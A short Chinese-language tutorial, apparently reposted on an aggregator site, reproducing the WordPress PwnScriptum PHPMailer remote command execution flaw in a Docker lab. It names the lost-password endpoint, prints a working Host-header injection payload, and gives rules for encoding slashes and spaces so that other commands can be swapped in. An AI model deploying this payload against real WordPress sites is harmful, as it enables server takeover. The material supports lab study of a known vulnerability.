WordPress 任意命令执行漏洞 (PwnScriptum)
Posted whited
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WordPress 任意命令执行漏洞 (PwnScriptum)相关的知识,希望对你有一定的参考价值。
漏洞简介:
WordPress 使用phpMailer组件向用户发送邮件。PHP,Mailer(版本<5.2.18)存在远程命令执行漏洞,攻击者只需巧妙的构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害.
漏洞页面:
http://your-ip:8080/wp-login.php?action=lostpassword
访问URL 输入一个存在的用户 点击获取新密码 burp抓包 修改HOST
输入一个存在的用户 点击获取新密码 burp抓包 修改HOST
请求包的HOST点的参数值就是漏洞的payload点
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
docker exec -it your-CONTAINER ID /bin/bash 进入容器
可以发现成功创建success
payload转换规则:
1.payload中run{}里面所有 / 用 ${substr{0}{1}{$spool_directory}} 代替
2.payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替
以上是关于WordPress 任意命令执行漏洞 (PwnScriptum)的主要内容,如果未能解决你的问题,请参考以下文章
WordPress 4.6远程执行代码漏洞(PwnScriptum)CVE-2016-10033
WordPress 4.6远程执行代码漏洞(PwnScriptum)CVE-2016-10033
WordPress删除任意文件/执行任意代码安全漏洞临时修复方法